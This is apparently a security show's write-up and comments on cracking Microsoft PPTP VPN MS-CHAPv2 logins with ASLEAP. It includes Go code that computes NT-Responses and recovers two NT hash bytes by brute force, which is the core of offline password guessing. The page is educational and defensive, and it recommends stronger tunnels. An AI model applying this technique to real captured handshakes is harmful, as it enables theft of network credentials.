Darren demonstrates cracking Microsoft VPN tunnels that use the MS-CHAPv2 authentication protocol, using Joshua Wright’s tool ASLEAP, and talks about the theory behind the attack.

Continuing on with our VPN series I find it important to highlight the weaknesses in the protocols we have talked about thus far. In my last segment I highlighted a tool that allows an attacker to easily hijack an SSL session using a man-in-the-middle attack. Couple this with Adito (aka OpenVPN-ALS), my favorite open-source SSL VPN server, and you can see the problem.

But what about the basic Microsoft VPN we set up a few weeks back? The VPN servers that we set up on Windows XP and Server 2003 used either Active Directory or local Windows accounts to authenticate users.

And looking back at our discussions on pwdump, rainbow tables and the like, you’ll remember the inherent weaknesses in Windows account credentials.

There are two ways Windows stores a user’s account credentials, or password: LAN Manager hashes, which are comprised of watered-down weaksauce, and NTLM hashes, which are susceptible to time-memory trade-off attacks.

The default VPN server implemented in Windows XP and Server 2003’s Routing and Remote Access service uses the Point-to-Point Tunneling Protocol (PPTP). This is convenient because Windows clients have supported Microsoft PPTP VPN connections natively since 2000, and in Windows 95/98 with Dial-Up Networking version 1.3.

The current authentication protocol for Microsoft’s PPTP is MS-CHAPv2, the Microsoft Challenge Handshake Authentication Protocol version 2, and it suffers from inherent weaknesses.

As far back as 1999 these weaknesses have been widely known. If you’re interested in reading more on the cryptanalysis of MS-CHAPv2, there’s a nifty paper written by Bruce Schneier and L0pht that I’ll link in the show notes.

And while other options exist, such as RADIUS, this is still the default option for PPTP authentication in Windows environments.

Joshua Wright, author of coWPAtty (see our segment here), released a proof-of-concept tool in 2004 to demonstrate weaknesses in the LEAP and PPTP protocols.

This tool, ASLEAP, was updated in 2007 to include an option to crack just MS-CHAPv2. Either by examining a packet capture that includes an MS-CHAP handshake, or by being given an MS-CHAP challenge and response directly, ASLEAP is able to deduce the username and the last two bytes of the NT hash. Using this information and a dictionary file, ASLEAP is then able to brute-force the hash.
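To make the theory concrete, here is an added example (not code from the episode, and not ASLEAP’s own code) in Go of the MS-CHAPv2 NT-Response computation from RFC 2759, a server-side verifier, and the two-byte observation from the 1999 cryptanalysis that the "last two bytes of the NT hash" step rests on. The challenges and user name are the RFC’s published section 9.2 test vector; the NT hash is a constructed sample value, not derived from any real password; the function names are my own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// challengeHash is SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[:8],
// the 8-byte value every DES block in the NT-Response encrypts (RFC 2759 section 8.2).
func challengeHash(peer, auth []byte, user string) []byte {
	s := sha1.New()
	s.Write(peer)
	s.Write(auth)
	s.Write([]byte(user))
	return s.Sum(nil)[:8]
}

// desBlock expands a 7-byte key to DES's 8-byte form (one parity bit after every
// 7 key bits; crypto/des ignores parity) and encrypts a single 8-byte block with it.
func desBlock(k7, block []byte) []byte {
	var acc uint64
	for _, b := range k7 {
		acc = acc<<8 | uint64(b)
	}
	key, out := make([]byte, 8), make([]byte, 8)
	for i := 7; i >= 0; i-- {
		key[i], acc = byte(acc&0x7f)<<1, acc>>7
	}
	c, err := des.NewCipher(key)
	if err != nil {
		panic(err)
	}
	c.Encrypt(out, block)
	return out
}

// ntResponse builds the 24-byte NT-Response from the user's NT hash (MD4 of the
// UTF-16LE password, unsalted). The 16-byte hash is zero-padded to 21 bytes and
// cut into three 7-byte DES keys that each encrypt the same challenge hash, so
// key 3 is hash[14:16] followed by five bytes that are already known to be zero.
func ntResponse(auth, peer []byte, user string, hash [16]byte) (resp, ch []byte) {
	ch = challengeHash(peer, auth, user)
	var padded [21]byte
	copy(padded[:], hash[:])
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(padded[i:i+7], ch)...)
	}
	return resp, ch
}

// verifyResponse is what the RRAS server does with its stored NT hash: recompute
// and compare. Nothing in the exchange is salted or rate-limited for an observer,
// so a captured handshake can be checked offline exactly this way.
func verifyResponse(auth, peer []byte, user string, hash [16]byte, resp []byte) bool {
	want, _ := ntResponse(auth, peer, user, hash)
	return bytes.Equal(want, resp)
}

// recoverLastTwo is the 1999 Schneier/Mudge observation: block 3 of the response
// depends on only two unknown key bytes, so at most 65536 DES encryptions of the
// challenge hash reveal hash[14:16]. Those two bytes are what ASLEAP reports, and
// they let dictionary candidates whose hash ends differently be discarded early.
func recoverLastTwo(ch, resp []byte) ([2]byte, bool) {
	k7 := make([]byte, 7) // bytes 2..6 are the zero padding, already known
	for i := 0; i < 1<<16; i++ {
		k7[0], k7[1] = byte(i>>8), byte(i)
		if bytes.Equal(desBlock(k7, ch), resp[16:24]) {
			return [2]byte{k7[0], k7[1]}, true
		}
	}
	return [2]byte{}, false
}

func main() {
	// Challenges and user name: public test vector from RFC 2759 section 9.2.
	// The hash is a constructed sample (00 11 22 ... FF), not a real password's.
	auth, _ := hex.DecodeString("5B5D7C7D7B3F2F3E3C2C602132262628")
	peer, _ := hex.DecodeString("21402324255E262A28295F2B3A337C7E")
	var hash [16]byte
	for i := range hash {
		hash[i] = byte(i * 17)
	}
	resp, ch := ntResponse(auth, peer, "User", hash)
	last2, ok := recoverLastTwo(ch, resp)
	fmt.Printf("ChallengeHash %X\nNT-Response   %X\n", ch, resp)
	fmt.Printf("server verify: %v; hash[14:16] from block 3: %X (found=%v)\n",
		verifyResponse(auth, peer, "User", hash, resp), last2[:], ok)
}
```

The takeaway for a defender is that the 24-byte response is protected by a 16-bit third block plus whatever dictionary resistance the password has, not by the 128 bits of the NT hash, and that any vantage point that sees the handshake has everything needed to check guesses offline. Bare PPTP with MS-CHAPv2 should therefore not be the only thing standing between the network and the Internet; certificate-based authentication, or an L2TP/IPsec or SSTP tunnel, removes the offline-guessable exchange.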

Hacking PPTP VPNs with ASLEAP

3 Comments

  • Rolroak

    I personally don’t have too much experience hacking, just a lot of research / school. What I would like to say is, this video is just as simplistic as your goal was: to display the inherent weakness in MSchap. Watching this video allowed me to piece together a lot of my research so as to better understand how these different systems work together. I really appreciate all the things you’re doing, explaining, and working on. There is a little something out there for everyone that hits this site that has the techno-lust. You have more advanced stuff for our programmers, links and places to start for us noobs.

    Either way keep up the great work guys.

    An idea: maybe you should have a segment on what and where to get some of the tools you guys frequently use, e.g. special network cards, different programs, the difference between Linux hacking and Windows hacking, and the tools that are used for each OS.

    What programming languages would be good to try and learn that would further our network security careers? Stuff like that. …

    Also any episode without Shannon in it is a sad episode ; ;. I think if she’s ever in Kansas City she should let me take her out to a movie!

    you guys are awesome!

  • bob

    Some additional information on security flaws with PPTP over IPv6:
    Huge Security Flaw Makes VPNs Useless for BitTorrent.

    The security risk is caused by a lethal combination of IPv6 and PPTP-based VPN services, which are very common. IPv6 is the Internet protocol that will succeed IPv4. The protocol is promoted by Windows 7 and Vista, among others, and most people are using it without even realizing it. We should recommend that everyone use an L2TP VPN or an SSTP VPN with SSL encryption.

    Great video thanks Darren …..
